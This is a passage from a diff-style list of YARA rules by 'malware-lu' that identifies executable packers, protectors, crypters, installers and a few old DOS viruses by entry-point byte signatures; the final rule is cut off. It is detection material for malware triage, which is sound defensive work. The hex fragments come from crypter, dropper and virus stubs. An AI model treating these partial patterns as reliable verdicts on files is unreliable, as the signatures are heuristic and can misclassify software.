+rule XXPack01bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 00 68 00 ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeLocker10IonIce
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorV101AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 ?? E8 86 00 00 00 E8 03 00 00 00 EB 01 ?? E8 79 00 00 00 E8 03 00 00 00 EB 01 ?? E8 A4 00 00 00 E8 03 00 00 00 EB 01 ?? E8 97 00 00 00 E8 03 00 00 00 EB 01 ?? E8 2D 00 00 00 E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED D5 E4 41 00 8B D5 81 C2 23 E5 41 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv2001AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 72 05 00 00 EB 4C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule USERNAMEv300
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FB 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 8C C8 2B C1 8B C8 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 33 C0 8E D8 06 0E 07 FC 33 F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nSpackV2xLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }
+
+condition:
+		$a0
+}
+	
+	
+rule GameGuardv20065xxdllsignbyhot_UNP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 FF 74 06 61 E9 4A 4D 50 30 BA 4C 00 00 00 80 7C 24 08 01 0F 85 ?? 01 00 00 60 BE 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack_PatchoranyVersionDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCPECalpha
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 8B CD 81 ?? ?? ?? ?? ?? 2B ?? ?? ?? ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4Unextractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 00 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Escargot01finalMeat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 40 30 2E 31 60 68 61 ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 92 ?? ?? ?? 8B 00 FF D0 50 B8 CD ?? ?? ?? 81 38 DE C0 37 13 75 2D 68 C9 ?? ?? ?? 6A 40 68 00 ?? 00 00 68 00 00 ?? ?? B8 96 ?? ?? ?? 8B 00 FF D0 8B 44 24 F0 8B 4C 24 F4 EB 05 49 C6 04 01 40 0B C9 75 F7 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MetrowerksCodeWarriorv20GUI
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 83 EC 44 55 B8 FF FF FF FF 50 50 68 ?? ?? 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule UnnamedScrambler21Beta211p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 15 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? 3A ?? ?? E8 ?? EE FF FF 33 C0 55 68 ?? 43 ?? ?? 64 FF 30 64 89 20 BA ?? 43 ?? ?? B8 E4 64 ?? ?? E8 0F FD FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? EE FF FF BA E8 64 ?? ?? 8B C3 8B 0D E4 64 ?? ?? E8 ?? D7 FF FF B8 F8 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 33 C0 A3 F8 ?? ?? ?? BB ?? ?? ?? ?? C7 45 EC E8 64 ?? ?? C7 45 E8 ?? ?? ?? ?? C7 45 E4 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? B8 E0 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 68 F4 01 00 00 E8 ?? EE FF FF 83 7B 04 00 75 0B 83 3B 00 0F 86 ?? 07 00 00 EB 06 0F 8E ?? 07 00 00 8B 03 8B D0 B8 E4 ?? ?? ?? E8 ?? E5 FF FF B8 E4 ?? ?? ?? E8 ?? E3 FF FF 8B D0 8B 45 EC 8B 0B E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule NoodleCryptv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 }
+	$a1 = { EB 01 9A E8 ?? 00 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule PoPa001PackeronPascalbagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 A4 3E 00 10 E8 30 F6 FF FF 33 C0 55 68 BE 40 00 10 ?? ?? ?? ?? 89 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 62 E7 FF FF 8B 45 EC E8 32 F2 FF FF 50 E8 B4 F6 FF FF A3 64 66 00 10 33 D2 55 68 93 40 00 10 64 FF 32 64 89 22 83 3D 64 66 00 10 FF 0F 84 3A 01 00 00 6A 00 6A 00 6A 00 A1 64 66 00 10 50 E8 9B F6 FF FF 83 E8 10 50 A1 64 66 00 10 50 E8 BC F6 FF FF 6A 00 68 80 66 00 10 6A 10 68 68 66 00 10 A1 64 66 00 10 50 E8 8B F6 FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BlindSpot10s134k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 50 02 00 00 8D 85 B0 FE FF FF 53 56 A3 90 12 40 00 57 8D 85 B0 FD FF FF 68 00 01 00 00 33 F6 50 56 FF 15 24 10 40 00 56 68 80 00 00 00 6A 03 56 56 8D 85 B0 FD FF FF 68 00 00 00 80 50 FF 15 20 10 40 00 56 56 68 00 08 00 00 50 89 45 FC FF 15 1C 10 40 00 8D 45 F8 8B 1D 18 10 40 00 56 50 6A 34 FF 35 90 12 40 00 FF 75 FC FF D3 85 C0 0F 84 7F 01 00 00 39 75 F8 0F 84 76 01 00 00 A1 90 12 40 00 66 8B 40 30 66 3D 01 00 75 14 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 14 10 40 00 EB 2C 66 3D 02 00 75 14 8D 85 E4 FE FF FF 50 68 04 01 00 00 FF 15 10 10 40 00 EB 12 8D 85 E4 FE FF FF 68 04 01 00 00 50 FF 15 0C 10 40 00 8B 3D 08 10 40 00 8D 85 E4 FE FF FF 68 54 10 40 00 50 }
+
+condition:
+		$a0
+}
+	
+	
+rule GamehouseMediaProtectorVersionUnknown
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv042
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 52 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv274WebToolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEManagerVersion301994cSolarDesigner
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 1E 06 CD 21 2E ?? ?? ?? BF ?? ?? B9 ?? ?? 33 C0 2E ?? ?? 47 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv02BetaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 ?? ?? AD 8B F8 95 A5 33 C0 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DEFv100Engbartxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AnslymCrypter
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 38 17 05 10 E8 5A 45 FB FF 33 C0 55 68 21 1C 05 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 E8 85 4C FB FF 6A 00 E8 0E 47 FB FF 6A 0A E8 27 49 FB FF E8 EA 47 FB FF 6A 0A 68 30 1C 05 10 A1 60 56 05 10 50 E8 68 47 FB FF 8B D8 85 DB 0F 84 B6 02 00 00 53 A1 60 56 05 10 50 E8 F2 48 FB FF 8B F0 85 F6 0F 84 A0 02 00 00 E8 F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtectorv02SMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 09 20 40 00 EB 02 83 09 8D B5 9A 20 40 00 EB 02 83 09 BA 0B 12 00 00 EB 01 00 8D 8D A5 32 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypKeyV56XDLLKenonicControlsLtd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 1D ?? ?? ?? ?? 83 FB 00 75 0A E8 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev102v104BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxHeloween1172
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? 56 50 06 0E 1F 8C C0 01 ?? ?? 01 ?? ?? 80 ?? ?? ?? ?? 8B ?? ?? A3 ?? ?? 8A ?? ?? A2 ?? ?? B8 ?? ?? CD 21 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PackedwithPKLITEv150withCRCcheck1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1F B4 09 BA ?? ?? CD 21 B8 ?? ?? CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Pe123v2006412
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C0 60 9C E8 01 00 00 00 C3 53 E8 72 00 00 00 50 E8 1C 03 00 00 8B D8 FF D3 5B C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B C0 55 8B EC 60 8B 4D 10 8B 7D 0C 8B 75 08 F3 A4 61 5D C2 0C 00 E8 00 00 00 00 58 83 E8 05 C3 8B C0 E8 00 00 00 00 58 83 C0 05 C3 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DropperCreatorV01Conflict
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8D 05 ?? ?? ?? ?? 29 C5 8D 85 ?? ?? ?? ?? 31 C0 64 03 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 }
+
+condition:
+		$a0
+}
+	
+	
+rule XCRv013
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 93 71 08 ?? ?? ?? ?? ?? ?? ?? ?? 8B D8 78 E2 ?? ?? ?? ?? 9C 33 C3 ?? ?? ?? ?? 60 79 CE ?? ?? ?? ?? E8 01 ?? ?? ?? ?? 83 C4 04 E8 AB FF FF FF ?? ?? ?? ?? 2B E8 ?? ?? ?? ?? 03 C5 FF 30 ?? ?? ?? ?? C6 ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XCRv012
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C E8 ?? ?? ?? ?? 8B DD 5D 81 ED ?? ?? ?? ?? 89 9D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InnoSetupModulev129
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 EC 89 45 C0 E8 5B 73 FF FF E8 D6 87 FF FF E8 C5 A9 FF FF E8 E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov3xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule dUP2xPatcherwwwdiablo2oo2cjbnet
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B CB 85 C9 74 ?? 80 3A 01 74 08 AC AE 75 0A 42 49 EB EF 47 46 42 49 EB E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02PEProtect09Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 07 00 00 00 58 83 C0 07 C6 90 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule pscrambler12byp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 ?? ?? ?? ?? 10 E8 2D F3 FF FF 33 C0 55 68 E8 31 00 10 64 FF 30 64 89 20 8D 45 E0 E8 53 F5 FF FF 8B 45 E0 8D 55 E4 E8 30 F6 FF FF 8B 45 E4 8D 55 E8 E8 A9 F4 FF FF 8B 45 E8 8D 55 EC E8 EE F7 FF FF 8B 55 EC B8 C4 54 00 10 E8 D9 EC FF FF 83 3D C4 54 00 10 00 0F 84 05 01 00 00 80 3D A0 40 00 10 00 74 41 A1 C4 54 00 10 E8 D9 ED FF FF E8 48 E0 FF FF 8B D8 A1 C4 54 00 10 E8 C8 ED FF FF 50 B8 C4 54 00 10 E8 65 EF FF FF 8B D3 59 E8 69 E1 FF FF 8B C3 E8 12 FA FF FF 8B C3 E8 33 E0 FF FF E9 AD 00 00 00 B8 05 01 00 00 E8 0C E0 FF FF 8B D8 53 68 05 01 00 00 E8 57 F3 FF FF 8D 45 DC 8B D3 E8 39 ED FF FF 8B 55 DC B8 14 56 00 10 B9 00 32 00 10 E8 BB ED FF FF 8B 15 14 56 00 10 B8 C8 54 00 10 E8 53 E5 FF FF BA 01 00 00 00 B8 C8 54 00 10 E8 8C E8 FF FF E8 DF E0 FF FF 85 C0 75 52 6A 00 A1 C4 54 00 10 E8 3B ED FF FF 50 B8 C4 54 00 10 E8 D8 EE FF FF 8B D0 B8 C8 54 00 10 59 E8 3B E6 FF FF E8 76 E0 FF FF B8 C8 54 00 10 E8 4C E6 FF FF E8 67 E0 FF FF 6A 00 6A 00 6A 00 A1 14 56 00 10 E8 53 EE FF FF 50 6A 00 6A 00 E8 41 F3 FF FF 80 3D 9C 40 00 10 00 74 05 E8 EF FB FF FF 33 C0 5A 59 59 64 89 10 68 EF 31 00 10 8D 45 DC BA 05 00 00 00 E8 7D EB FF FF C3 E9 23 E9 FF FF EB EB 5B E8 63 EA FF FF 00 00 00 FF FF FF FF 08 00 00 00 74 65 6D 70 2E 65 78 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2223compressedcodewwwstrongbitcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 }
+	$a1 = { E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 B8 C8 ?? ?? ?? 8B 04 18 FF D0 59 58 5B 83 EB 05 C6 03 B8 43 89 03 83 C3 04 C6 03 C3 09 C9 74 46 89 C3 E8 A0 00 00 00 FC AD 83 F8 FF 74 38 53 89 CB 01 C3 01 0B 83 C3 04 AC 3C FE 73 07 25 FF 00 00 00 EB ED 81 C3 FE 00 00 00 09 C0 7A 09 66 AD 25 FF FF 00 00 EB DA AD 4E 25 FF FF FF 00 3D FF FF FF 00 75 CC ?? ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Armadillov265b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 38 ?? ?? ?? 68 40 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117aPLibAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 74 1F 00 00 8D 9D 1E 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyCryptPE214b215JLabSoftwareCreationshoep
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 91 8B F4 AD FE C9 80 34 08 ?? E2 FA C3 60 E8 ED FF FF FF EB }
+
+condition:
+		$a0
+}
+	
+	
+rule yodasProtector10xAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 E8 03 00 00 00 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upack_UnknownDLLDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 17 CD 00 00 E9 06 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AINEXEv21
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 36 A3 ?? ?? 05 ?? ?? 36 A3 ?? ?? 2E A1 ?? ?? 8A D4 B1 04 D2 EA FE C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AppProtectorSilentTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 97 00 00 00 0D 0A 53 69 6C 65 6E 74 20 54 65 61 6D 20 41 70 70 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 72 65 61 74 65 64 20 62 79 20 53 69 6C 65 6E 74 20 53 6F 66 74 77 61 72 65 0D 0A 54 68 65 6E 6B 7A 20 74 6F 20 44 6F 63 68 74 6F 72 20 58 0D 0A 0D 0A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RODHighTECHAyman
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B 15 1D 13 40 00 F7 E0 8D 82 83 19 00 00 E8 58 0C 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ICrypt10byBuGGz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 56 57 33 C0 89 45 EC B8 70 3B 00 10 E8 3C FA FF FF 33 C0 55 68 6C 3C 00 10 64 FF 30 64 89 20 6A 0A 68 7C 3C 00 10 A1 50 56 00 10 50 E8 D8 FA FF FF 8B D8 53 A1 50 56 00 10 50 E8 0A FB FF FF 8B F8 53 A1 50 56 00 10 50 E8 D4 FA FF FF 8B D8 53 E8 D4 FA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 64 56 00 10 E8 25 F6 FF FF B8 64 56 00 10 E8 13 F6 FF FF 8B CF 8B D6 E8 E6 FA FF FF 53 E8 90 FA FF FF 8D 4D EC BA 8C 3C 00 10 A1 64 56 00 10 E8 16 FB FF FF 8B 55 EC B8 64 56 00 10 E8 C5 F4 FF FF B8 64 56 00 10 E8 DB F5 FF FF E8 56 FC FF FF 33 C0 5A 59 59 64 89 10 68 73 3C 00 10 8D 45 EC E8 4D F4 FF FF C3 E9 E3 EE FF FF EB F0 5F 5E 5B E8 4D F3 FF FF 00 53 45 54 ?? ?? ?? ?? 00 FF FF FF FF 08 00 00 00 76 6F 74 72 65 63 6C 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPackv099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 83 ED 06 80 BD E0 04 ?? ?? 01 0F 84 F2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV115V117LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 83 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB 14 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxQuake518
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C8 8E D8 ?? ?? ?? ?? ?? ?? ?? B8 21 35 CD 21 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4UnextractableVirusShield
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 05 40 1B B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium13013ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV130XObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B ?? ?? ?? EB 04 ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MetrowerksCodeWarriorv20Console
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 55 B8 FF FF FF FF 50 50 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 E8 ?? ?? 00 00 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESpinv07Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimpleUPXCryptorV3042005MANtiCORE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinRAR32bitSFXModule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? 00 00 00 00 00 00 90 90 90 ?? ?? ?? ?? ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule iPBProtect013017forgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeASPack211demadicius
+{
+      meta:
+		author="malware-lu"
+strings:
